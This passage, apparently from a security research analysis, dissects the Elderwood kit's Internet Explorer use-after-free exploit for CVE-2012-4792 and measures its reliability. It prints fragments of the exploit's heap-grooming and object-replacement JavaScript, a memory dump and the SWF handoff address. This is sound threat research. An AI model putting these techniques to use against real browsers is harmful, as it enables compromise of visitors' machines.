} catch (e) {}

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This condition suggests that the vulnerability trigger is separate from any code the developer wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with almost every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different. The exploit author uses %u encoding to fully control the first DWORD in the allocation, the vtable of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. In this case, a very fragile technique was used to overwrite the freed CButton object, and the exploit fails to reliably gain control of execution on exploited browsers as a result. Instead of overwriting a large number of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.


Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload execution vs total attempts in these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with versions of Internet Explorer, Flash and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although creating holes, as described in the previous code snippets, is not strictly necessary to trigger the vulnerability or exploit it successfully, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such low reliability below:

  • The reliance on the constant memory address provided by the SWF. If memory allocations occur elsewhere, and not at this address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0x10000000.
  • The assumption that the 21st object will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, then this assumption will cause the exploit to fail. In this case, the exploit will dereference 0x00410042 from the allocations of the “ab” strings.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability, however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors that should have been exploited were not, due to the fragility of the replacement technique.


After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.

